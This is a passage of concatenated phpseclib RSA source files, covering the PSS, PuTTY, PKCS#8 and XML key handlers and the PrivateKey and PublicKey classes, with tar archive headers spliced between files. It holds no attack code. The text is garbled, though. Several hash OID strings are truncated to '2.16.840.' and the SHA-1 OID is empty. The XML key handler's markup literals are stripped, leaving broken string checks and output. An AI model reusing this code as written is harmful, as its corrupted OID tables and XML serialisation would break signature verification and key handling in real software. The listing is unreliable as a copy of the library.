'md4' => '1.2.840.113549.2.4', 'md5' => '1.2.840.113549.2.5', 'id-sha1' => '', 'id-sha256' => '2.16.840.', 'id-sha384' => '2.16.840.', 'id-sha512' => '2.16.840.', 'id-sha224' => '2.16.840.', 'id-sha512/224' => '2.16.840.', 'id-sha512/256' => '2.16.840.', 'id-mgf1' => '1.2.840.113549.1.1.8' ]); self::$oidsLoaded = true; } } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } $components = ['isPublicKey' => strpos($key, 'PUBLIC') !== false]; $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'private' : 'public'; $result = $components + PKCS1::load($key[$type . 'Key']); if (isset($key[$type . 'KeyAlgorithm']['parameters'])) { $decoded = ASN1::decodeBER($key[$type . 'KeyAlgorithm']['parameters']); if ($decoded === false) { throw new \UnexpectedValueException('Unable to decode parameters'); } $params = ASN1::asn1map($decoded[0], Maps\RSASSA_PSS_params::MAP); } else { $params = []; } if (isset($params['maskGenAlgorithm']['parameters'])) { $decoded = ASN1::decodeBER($params['maskGenAlgorithm']['parameters']); if ($decoded === false) { throw new \UnexpectedValueException('Unable to decode parameters'); } $params['maskGenAlgorithm']['parameters'] = ASN1::asn1map($decoded[0], Maps\HashAlgorithm::MAP); } else { $params['maskGenAlgorithm'] = [ 'algorithm' => 'id-mgf1', 'parameters' => ['algorithm' => 'id-sha1'] ]; } if (!isset($params['hashAlgorithm']['algorithm'])) { $params['hashAlgorithm']['algorithm'] = 'id-sha1'; } $result['hash'] = str_replace('id-', '', $params['hashAlgorithm']['algorithm']); $result['MGFHash'] = str_replace('id-', '', $params['maskGenAlgorithm']['parameters']['algorithm']); if (isset($params['saltLength'])) { $result['saltLength'] = (int) $params['saltLength']->toString(); } if (isset($key['meta'])) { $result['meta'] = $key['meta']; } return $result; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { self::initialize_static_variables(); $key = PKCS1::savePrivateKey($n, $e, $d, $primes, $exponents, $coefficients); $key = ASN1::extractBER($key); $params = self::savePSSParams($options); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e, array $options = []) { self::initialize_static_variables(); $key = PKCS1::savePublicKey($n, $e); $key = ASN1::extractBER($key); $params = self::savePSSParams($options); return self::wrapPublicKey($key, $params); } /** * Encodes PSS parameters * * @param array $options * @return string */ public static function savePSSParams(array $options) { /* The trailerField field is an integer. It provides compatibility with IEEE Std 1363a-2004 [P1363A]. The value MUST be 1, which represents the trailer field with hexadecimal value 0xBC. Other trailer fields, including the trailer field composed of HashID concatenated with 0xCC that is specified in IEEE Std 1363a, are not supported. Implementations that perform signature generation MUST omit the trailerField field, indicating that the default trailer field value was used. Implementations that perform signature validation MUST recognize both a present trailerField field with value 1 and an absent trailerField field. source: https://tools.ietf.org/html/rfc4055#page-9 */ $params = [ 'trailerField' => new BigInteger(1) ]; if (isset($options['hash'])) { $params['hashAlgorithm']['algorithm'] = 'id-' . $options['hash']; } if (isset($options['MGFHash'])) { $temp = ['algorithm' => 'id-' . $options['MGFHash']]; $temp = ASN1::encodeDER($temp, Maps\HashAlgorithm::MAP); $params['maskGenAlgorithm'] = [ 'algorithm' => 'id-mgf1', 'parameters' => new ASN1\Element($temp) ]; } if (isset($options['saltLength'])) { $params['saltLength'] = new BigInteger($options['saltLength']); } return new ASN1\Element(ASN1::encodeDER($params, Maps\RSASSA_PSS_params::MAP)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PuTTY.php000064400000007127147600400120023532 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use phpseclib3\Math\BigInteger; /** * PuTTY Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class PuTTY extends Progenitor { /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'phpseclib3\Crypt\RSA\Formats\Keys\OpenSSH'; /** * Algorithm Identifier * * @var array */ protected static $types = ['ssh-rsa']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { static $one; if (!isset($one)) { $one = new BigInteger(1); } $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } extract($components); unset($components['public'], $components['private']); $isPublicKey = false; $result = Strings::unpackSSH2('ii', $public); if ($result === false) { throw new \UnexpectedValueException('Key appears to be malformed'); } list($publicExponent, $modulus) = $result; $result = Strings::unpackSSH2('iiii', $private); if ($result === false) { throw new \UnexpectedValueException('Key appears to be malformed'); } $primes = $coefficients = []; list($privateExponent, $primes[1], $primes[2], $coefficients[2]) = $result; $temp = $primes[1]->subtract($one); $exponents = [1 => $publicExponent->modInverse($temp)]; $temp = $primes[2]->subtract($one); $exponents[] = $publicExponent->modInverse($temp); return compact('publicExponent', 'modulus', 'privateExponent', 'primes', 'coefficients', 'exponents', 'comment', 'isPublicKey'); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (count($primes) != 2) { throw new \InvalidArgumentException('PuTTY does not support multi-prime RSA keys'); } $public = Strings::packSSH2('ii', $e, $n); $private = Strings::packSSH2('iiii', $d, $primes[1], $primes[2], $coefficients[2]); return self::wrapPrivateKey($public, $private, 'ssh-rsa', $password, $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e) { return self::wrapPublicKey(Strings::packSSH2('ii', $e, $n), 'ssh-rsa'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PKCS8.php000064400000006445147600400120023377 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class PKCS8 extends Progenitor { /** * OID Name * * @var string */ const OID_NAME = 'rsaEncryption'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.1.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); if (isset($key['privateKey'])) { $components['isPublicKey'] = false; $type = 'private'; } else { $components['isPublicKey'] = true; $type = 'public'; } $result = $components + PKCS1::load($key[$type . 'Key']); if (isset($key['meta'])) { $result['meta'] = $key['meta']; } return $result; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $key = PKCS1::savePrivateKey($n, $e, $d, $primes, $exponents, $coefficients); $key = ASN1::extractBER($key); return self::wrapPrivateKey($key, [], null, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e, array $options = []) { $key = PKCS1::savePublicKey($n, $e); $key = ASN1::extractBER($key); return self::wrapPublicKey($key, null); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/XML.php000064400000013705147600400120023204 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * XML Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class XML { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (!class_exists('DOMDocument')) { throw new BadConfigurationException('The dom extension is not setup correctly on this system'); } $components = [ 'isPublicKey' => false, 'primes' => [], 'exponents' => [], 'coefficients' => [] ]; $use_errors = libxml_use_internal_errors(true); $dom = new \DOMDocument(); if (substr($key, 0, 5) != '' . $key . ''; } if (!$dom->loadXML($key)) { libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); $keys = ['modulus', 'exponent', 'p', 'q', 'dp', 'dq', 'inverseq', 'd']; foreach ($keys as $key) { // $dom->getElementsByTagName($key) is case-sensitive $temp = $xpath->query("//*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='$key']"); if (!$temp->length) { continue; } $value = new BigInteger(Strings::base64_decode($temp->item(0)->nodeValue), 256); switch ($key) { case 'modulus': $components['modulus'] = $value; break; case 'exponent': $components['publicExponent'] = $value; break; case 'p': $components['primes'][1] = $value; break; case 'q': $components['primes'][2] = $value; break; case 'dp': $components['exponents'][1] = $value; break; case 'dq': $components['exponents'][2] = $value; break; case 'inverseq': $components['coefficients'][2] = $value; break; case 'd': $components['privateExponent'] = $value; } } libxml_use_internal_errors($use_errors); foreach ($components as $key => $value) { if (is_array($value) && !count($value)) { unset($components[$key]); } } if (isset($components['modulus']) && isset($components['publicExponent'])) { if (count($components) == 3) { $components['isPublicKey'] = true; } return $components; } throw new \UnexpectedValueException('Modulus / exponent not present'); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '') { if (count($primes) != 2) { throw new \InvalidArgumentException('XML does not support multi-prime RSA keys'); } if (!empty($password) && is_string($password)) { throw new UnsupportedFormatException('XML private keys do not support encryption'); } return "\r\n" . ' ' . Strings::base64_encode($n->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($e->toBytes()) . "\r\n" . '

' . Strings::base64_encode($primes[1]->toBytes()) . "

\r\n" . ' ' . Strings::base64_encode($primes[2]->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($exponents[1]->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($exponents[2]->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($coefficients[2]->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($d->toBytes()) . "\r\n" . '
'; } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e) { return "\r\n" . ' ' . Strings::base64_encode($n->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($e->toBytes()) . "\r\n" . ''; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/PrivateKey.php000064400000037451147600400120022305 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\RSA; use phpseclib3\Crypt\RSA\Formats\Keys\PSS; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton */ final class PrivateKey extends RSA implements Common\PrivateKey { use Common\Traits\PasswordProtected; /** * Primes for Chinese Remainder Theorem (ie. p and q) * * @var array */ protected $primes; /** * Exponents for Chinese Remainder Theorem (ie. dP and dQ) * * @var array */ protected $exponents; /** * Coefficients for Chinese Remainder Theorem (ie. qInv) * * @var array */ protected $coefficients; /** * Private Exponent * * @var \phpseclib3\Math\BigInteger */ protected $privateExponent; /** * RSADP * * See {@link http://tools.ietf.org/html/rfc3447#section-5.1.2 RFC3447#section-5.1.2}. * * @return bool|\phpseclib3\Math\BigInteger */ private function rsadp(BigInteger $c) { if ($c->compare(self::$zero) < 0 || $c->compare($this->modulus) > 0) { throw new \OutOfRangeException('Ciphertext representative out of range'); } return $this->exponentiate($c); } /** * RSASP1 * * See {@link http://tools.ietf.org/html/rfc3447#section-5.2.1 RFC3447#section-5.2.1}. * * @return bool|\phpseclib3\Math\BigInteger */ private function rsasp1(BigInteger $m) { if ($m->compare(self::$zero) < 0 || $m->compare($this->modulus) > 0) { throw new \OutOfRangeException('Signature representative out of range'); } return $this->exponentiate($m); } /** * Exponentiate * * @param \phpseclib3\Math\BigInteger $x * @return \phpseclib3\Math\BigInteger */ protected function exponentiate(BigInteger $x) { switch (true) { case empty($this->primes): case $this->primes[1]->equals(self::$zero): case empty($this->coefficients): case $this->coefficients[2]->equals(self::$zero): case empty($this->exponents): case $this->exponents[1]->equals(self::$zero): return $x->modPow($this->exponent, $this->modulus); } $num_primes = count($this->primes); if (!static::$enableBlinding) { $m_i = [ 1 => $x->modPow($this->exponents[1], $this->primes[1]), 2 => $x->modPow($this->exponents[2], $this->primes[2]) ]; $h = $m_i[1]->subtract($m_i[2]); $h = $h->multiply($this->coefficients[2]); list(, $h) = $h->divide($this->primes[1]); $m = $m_i[2]->add($h->multiply($this->primes[2])); $r = $this->primes[1]; for ($i = 3; $i <= $num_primes; $i++) { $m_i = $x->modPow($this->exponents[$i], $this->primes[$i]); $r = $r->multiply($this->primes[$i - 1]); $h = $m_i->subtract($m); $h = $h->multiply($this->coefficients[$i]); list(, $h) = $h->divide($this->primes[$i]); $m = $m->add($r->multiply($h)); } } else { $smallest = $this->primes[1]; for ($i = 2; $i <= $num_primes; $i++) { if ($smallest->compare($this->primes[$i]) > 0) { $smallest = $this->primes[$i]; } } $r = BigInteger::randomRange(self::$one, $smallest->subtract(self::$one)); $m_i = [ 1 => $this->blind($x, $r, 1), 2 => $this->blind($x, $r, 2) ]; $h = $m_i[1]->subtract($m_i[2]); $h = $h->multiply($this->coefficients[2]); list(, $h) = $h->divide($this->primes[1]); $m = $m_i[2]->add($h->multiply($this->primes[2])); $r = $this->primes[1]; for ($i = 3; $i <= $num_primes; $i++) { $m_i = $this->blind($x, $r, $i); $r = $r->multiply($this->primes[$i - 1]); $h = $m_i->subtract($m); $h = $h->multiply($this->coefficients[$i]); list(, $h) = $h->divide($this->primes[$i]); $m = $m->add($r->multiply($h)); } } return $m; } /** * Performs RSA Blinding * * Protects against timing attacks by employing RSA Blinding. * Returns $x->modPow($this->exponents[$i], $this->primes[$i]) * * @param \phpseclib3\Math\BigInteger $x * @param \phpseclib3\Math\BigInteger $r * @param int $i * @return \phpseclib3\Math\BigInteger */ private function blind(BigInteger $x, BigInteger $r, $i) { $x = $x->multiply($r->modPow($this->publicExponent, $this->primes[$i])); $x = $x->modPow($this->exponents[$i], $this->primes[$i]); $r = $r->modInverse($this->primes[$i]); $x = $x->multiply($r); list(, $x) = $x->divide($this->primes[$i]); return $x; } /** * EMSA-PSS-ENCODE * * See {@link http://tools.ietf.org/html/rfc3447#section-9.1.1 RFC3447#section-9.1.1}. * * @return string * @param string $m * @throws \RuntimeException on encoding error * @param int $emBits */ private function emsa_pss_encode($m, $emBits) { // if $m is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. $emLen = ($emBits + 1) >> 3; // ie. ceil($emBits / 8) $sLen = $this->sLen !== null ? $this->sLen : $this->hLen; $mHash = $this->hash->hash($m); if ($emLen < $this->hLen + $sLen + 2) { throw new \LengthException('RSA modulus too short'); } $salt = Random::string($sLen); $m2 = "\0\0\0\0\0\0\0\0" . $mHash . $salt; $h = $this->hash->hash($m2); $ps = str_repeat(chr(0), $emLen - $sLen - $this->hLen - 2); $db = $ps . chr(1) . $salt; $dbMask = $this->mgf1($h, $emLen - $this->hLen - 1); // ie. stlren($db) $maskedDB = $db ^ $dbMask; $maskedDB[0] = ~chr(0xFF << ($emBits & 7)) & $maskedDB[0]; $em = $maskedDB . $h . chr(0xBC); return $em; } /** * RSASSA-PSS-SIGN * * See {@link http://tools.ietf.org/html/rfc3447#section-8.1.1 RFC3447#section-8.1.1}. * * @param string $m * @return bool|string */ private function rsassa_pss_sign($m) { // EMSA-PSS encoding $em = $this->emsa_pss_encode($m, 8 * $this->k - 1); // RSA signature $m = $this->os2ip($em); $s = $this->rsasp1($m); $s = $this->i2osp($s, $this->k); // Output the signature S return $s; } /** * RSASSA-PKCS1-V1_5-SIGN * * See {@link http://tools.ietf.org/html/rfc3447#section-8.2.1 RFC3447#section-8.2.1}. * * @param string $m * @throws \LengthException if the RSA modulus is too short * @return bool|string */ private function rsassa_pkcs1_v1_5_sign($m) { // EMSA-PKCS1-v1_5 encoding // If the encoding operation outputs "intended encoded message length too short," output "RSA modulus // too short" and stop. try { $em = $this->emsa_pkcs1_v1_5_encode($m, $this->k); } catch (\LengthException $e) { throw new \LengthException('RSA modulus too short'); } // RSA signature $m = $this->os2ip($em); $s = $this->rsasp1($m); $s = $this->i2osp($s, $this->k); // Output the signature S return $s; } /** * Create a signature * * @see self::verify() * @param string $message * @return string */ public function sign($message) { switch ($this->signaturePadding) { case self::SIGNATURE_PKCS1: case self::SIGNATURE_RELAXED_PKCS1: return $this->rsassa_pkcs1_v1_5_sign($message); //case self::SIGNATURE_PSS: default: return $this->rsassa_pss_sign($message); } } /** * RSAES-PKCS1-V1_5-DECRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.2.2 RFC3447#section-7.2.2}. * * @param string $c * @return bool|string */ private function rsaes_pkcs1_v1_5_decrypt($c) { // Length checking if (strlen($c) != $this->k) { // or if k < 11 throw new \LengthException('Ciphertext representative too long'); } // RSA decryption $c = $this->os2ip($c); $m = $this->rsadp($c); $em = $this->i2osp($m, $this->k); // EME-PKCS1-v1_5 decoding if (ord($em[0]) != 0 || ord($em[1]) > 2) { throw new \RuntimeException('Decryption error'); } $ps = substr($em, 2, strpos($em, chr(0), 2) - 2); $m = substr($em, strlen($ps) + 3); if (strlen($ps) < 8) { throw new \RuntimeException('Decryption error'); } // Output M return $m; } /** * RSAES-OAEP-DECRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.1.2 RFC3447#section-7.1.2}. The fact that the error * messages aren't distinguishable from one another hinders debugging, but, to quote from RFC3447#section-7.1.2: * * Note. Care must be taken to ensure that an opponent cannot * distinguish the different error conditions in Step 3.g, whether by * error message or timing, or, more generally, learn partial * information about the encoded message EM. Otherwise an opponent may * be able to obtain useful information about the decryption of the * ciphertext C, leading to a chosen-ciphertext attack such as the one * observed by Manger [36]. * * @param string $c * @return bool|string */ private function rsaes_oaep_decrypt($c) { // Length checking // if $l is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. if (strlen($c) != $this->k || $this->k < 2 * $this->hLen + 2) { throw new \LengthException('Ciphertext representative too long'); } // RSA decryption $c = $this->os2ip($c); $m = $this->rsadp($c); $em = $this->i2osp($m, $this->k); // EME-OAEP decoding $lHash = $this->hash->hash($this->label); $y = ord($em[0]); $maskedSeed = substr($em, 1, $this->hLen); $maskedDB = substr($em, $this->hLen + 1); $seedMask = $this->mgf1($maskedDB, $this->hLen); $seed = $maskedSeed ^ $seedMask; $dbMask = $this->mgf1($seed, $this->k - $this->hLen - 1); $db = $maskedDB ^ $dbMask; $lHash2 = substr($db, 0, $this->hLen); $m = substr($db, $this->hLen); $hashesMatch = hash_equals($lHash, $lHash2); $leadingZeros = 1; $patternMatch = 0; $offset = 0; for ($i = 0; $i < strlen($m); $i++) { $patternMatch |= $leadingZeros & ($m[$i] === "\1"); $leadingZeros &= $m[$i] === "\0"; $offset += $patternMatch ? 0 : 1; } // we do | instead of || to avoid https://en.wikipedia.org/wiki/Short-circuit_evaluation // to protect against timing attacks if (!$hashesMatch | !$patternMatch) { throw new \RuntimeException('Decryption error'); } // Output the message M return substr($m, $offset + 1); } /** * Raw Encryption / Decryption * * Doesn't use padding and is not recommended. * * @param string $m * @return bool|string * @throws \LengthException if strlen($m) > $this->k */ private function raw_encrypt($m) { if (strlen($m) > $this->k) { throw new \LengthException('Ciphertext representative too long'); } $temp = $this->os2ip($m); $temp = $this->rsadp($temp); return $this->i2osp($temp, $this->k); } /** * Decryption * * @see self::encrypt() * @param string $ciphertext * @return bool|string */ public function decrypt($ciphertext) { switch ($this->encryptionPadding) { case self::ENCRYPTION_NONE: return $this->raw_encrypt($ciphertext); case self::ENCRYPTION_PKCS1: return $this->rsaes_pkcs1_v1_5_decrypt($ciphertext); //case self::ENCRYPTION_OAEP: default: return $this->rsaes_oaep_decrypt($ciphertext); } } /** * Returns the public key * * @return mixed */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (empty($this->modulus) || empty($this->publicExponent)) { throw new \RuntimeException('Public key components not found'); } $key = $type::savePublicKey($this->modulus, $this->publicExponent); return RSA::loadFormat('PKCS8', $key) ->withHash($this->hash->getHash()) ->withMGFHash($this->mgfHash->getHash()) ->withSaltLength($this->sLen) ->withLabel($this->label) ->withPadding($this->signaturePadding | $this->encryptionPadding); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin( 'Keys', $type, empty($this->primes) ? 'savePublicKey' : 'savePrivateKey' ); if ($type == PSS::class) { if ($this->signaturePadding == self::SIGNATURE_PSS) { $options += [ 'hash' => $this->hash->getHash(), 'MGFHash' => $this->mgfHash->getHash(), 'saltLength' => $this->getSaltLength() ]; } else { throw new UnsupportedFormatException('The PSS format can only be used when the signature method has been explicitly set to PSS'); } } if (empty($this->primes)) { return $type::savePublicKey($this->modulus, $this->exponent, $options); } return $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $this->primes, $this->exponents, $this->coefficients, $this->password, $options); /* $key = $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $this->primes, $this->exponents, $this->coefficients, $this->password, $options); if ($key !== false || count($this->primes) == 2) { return $key; } $nSize = $this->getSize() >> 1; $primes = [1 => clone self::$one, clone self::$one]; $i = 1; foreach ($this->primes as $prime) { $primes[$i] = $primes[$i]->multiply($prime); if ($primes[$i]->getLength() >= $nSize) { $i++; } } $exponents = []; $coefficients = [2 => $primes[2]->modInverse($primes[1])]; foreach ($primes as $i => $prime) { $temp = $prime->subtract(self::$one); $exponents[$i] = $this->modulus->modInverse($temp); } return $type::savePrivateKey($this->modulus, $this->publicExponent, $this->exponent, $primes, $exponents, $coefficients, $this->password, $options); */ } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/PublicKey.php000064400000036177147600400120022115 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\RSA; use phpseclib3\Crypt\RSA\Formats\Keys\PSS; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps\DigestInfo; use phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton */ final class PublicKey extends RSA implements Common\PublicKey { use Common\Traits\Fingerprint; /** * Exponentiate * * @param \phpseclib3\Math\BigInteger $x * @return \phpseclib3\Math\BigInteger */ private function exponentiate(BigInteger $x) { return $x->modPow($this->exponent, $this->modulus); } /** * RSAVP1 * * See {@link http://tools.ietf.org/html/rfc3447#section-5.2.2 RFC3447#section-5.2.2}. * * @param \phpseclib3\Math\BigInteger $s * @return bool|\phpseclib3\Math\BigInteger */ private function rsavp1($s) { if ($s->compare(self::$zero) < 0 || $s->compare($this->modulus) > 0) { return false; } return $this->exponentiate($s); } /** * RSASSA-PKCS1-V1_5-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-8.2.2 RFC3447#section-8.2.2}. * * @param string $m * @param string $s * @throws \LengthException if the RSA modulus is too short * @return bool */ private function rsassa_pkcs1_v1_5_verify($m, $s) { // Length checking if (strlen($s) != $this->k) { return false; } // RSA verification $s = $this->os2ip($s); $m2 = $this->rsavp1($s); if ($m2 === false) { return false; } $em = $this->i2osp($m2, $this->k); if ($em === false) { return false; } // EMSA-PKCS1-v1_5 encoding $exception = false; // If the encoding operation outputs "intended encoded message length too short," output "RSA modulus // too short" and stop. try { $em2 = $this->emsa_pkcs1_v1_5_encode($m, $this->k); $r1 = hash_equals($em, $em2); } catch (\LengthException $e) { $exception = true; } try { $em3 = $this->emsa_pkcs1_v1_5_encode_without_null($m, $this->k); $r2 = hash_equals($em, $em3); } catch (\LengthException $e) { $exception = true; } catch (UnsupportedAlgorithmException $e) { $r2 = false; } if ($exception) { throw new \LengthException('RSA modulus too short'); } // Compare return $r1 || $r2; } /** * RSASSA-PKCS1-V1_5-VERIFY (relaxed matching) * * Per {@link http://tools.ietf.org/html/rfc3447#page-43 RFC3447#page-43} PKCS1 v1.5 * specified the use BER encoding rather than DER encoding that PKCS1 v2.0 specified. * This means that under rare conditions you can have a perfectly valid v1.5 signature * that fails to validate with _rsassa_pkcs1_v1_5_verify(). PKCS1 v2.1 also recommends * that if you're going to validate these types of signatures you "should indicate * whether the underlying BER encoding is a DER encoding and hence whether the signature * is valid with respect to the specification given in [PKCS1 v2.0+]". so if you do * $rsa->getLastPadding() and get RSA::PADDING_RELAXED_PKCS1 back instead of * RSA::PADDING_PKCS1... that means BER encoding was used. * * @param string $m * @param string $s * @return bool */ private function rsassa_pkcs1_v1_5_relaxed_verify($m, $s) { // Length checking if (strlen($s) != $this->k) { return false; } // RSA verification $s = $this->os2ip($s); $m2 = $this->rsavp1($s); if ($m2 === false) { return false; } $em = $this->i2osp($m2, $this->k); if ($em === false) { return false; } if (Strings::shift($em, 2) != "\0\1") { return false; } $em = ltrim($em, "\xFF"); if (Strings::shift($em) != "\0") { return false; } $decoded = ASN1::decodeBER($em); if (!is_array($decoded) || empty($decoded[0]) || strlen($em) > $decoded[0]['length']) { return false; } static $oids; if (!isset($oids)) { $oids = [ 'md2' => '1.2.840.113549.2.2', 'md4' => '1.2.840.113549.2.4', // from PKCS1 v1.5 'md5' => '1.2.840.113549.2.5', 'id-sha1' => '', 'id-sha256' => '2.16.840.', 'id-sha384' => '2.16.840.', 'id-sha512' => '2.16.840.', // from PKCS1 v2.2 'id-sha224' => '2.16.840.', 'id-sha512/224' => '2.16.840.', 'id-sha512/256' => '2.16.840.', ]; ASN1::loadOIDs($oids); } $decoded = ASN1::asn1map($decoded[0], DigestInfo::MAP); if (!isset($decoded) || $decoded === false) { return false; } if (!isset($oids[$decoded['digestAlgorithm']['algorithm']])) { return false; } if (isset($decoded['digestAlgorithm']['parameters']) && $decoded['digestAlgorithm']['parameters'] !== ['null' => '']) { return false; } $hash = $decoded['digestAlgorithm']['algorithm']; $hash = substr($hash, 0, 3) == 'id-' ? substr($hash, 3) : $hash; $hash = new Hash($hash); $em = $hash->hash($m); $em2 = $decoded['digest']; return hash_equals($em, $em2); } /** * EMSA-PSS-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-9.1.2 RFC3447#section-9.1.2}. * * @param string $m * @param string $em * @param int $emBits * @return string */ private function emsa_pss_verify($m, $em, $emBits) { // if $m is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. $emLen = ($emBits + 7) >> 3; // ie. ceil($emBits / 8); $sLen = $this->sLen !== null ? $this->sLen : $this->hLen; $mHash = $this->hash->hash($m); if ($emLen < $this->hLen + $sLen + 2) { return false; } if ($em[strlen($em) - 1] != chr(0xBC)) { return false; } $maskedDB = substr($em, 0, -$this->hLen - 1); $h = substr($em, -$this->hLen - 1, $this->hLen); $temp = chr(0xFF << ($emBits & 7)); if ((~$maskedDB[0] & $temp) != $temp) { return false; } $dbMask = $this->mgf1($h, $emLen - $this->hLen - 1); $db = $maskedDB ^ $dbMask; $db[0] = ~chr(0xFF << ($emBits & 7)) & $db[0]; $temp = $emLen - $this->hLen - $sLen - 2; if (substr($db, 0, $temp) != str_repeat(chr(0), $temp) || ord($db[$temp]) != 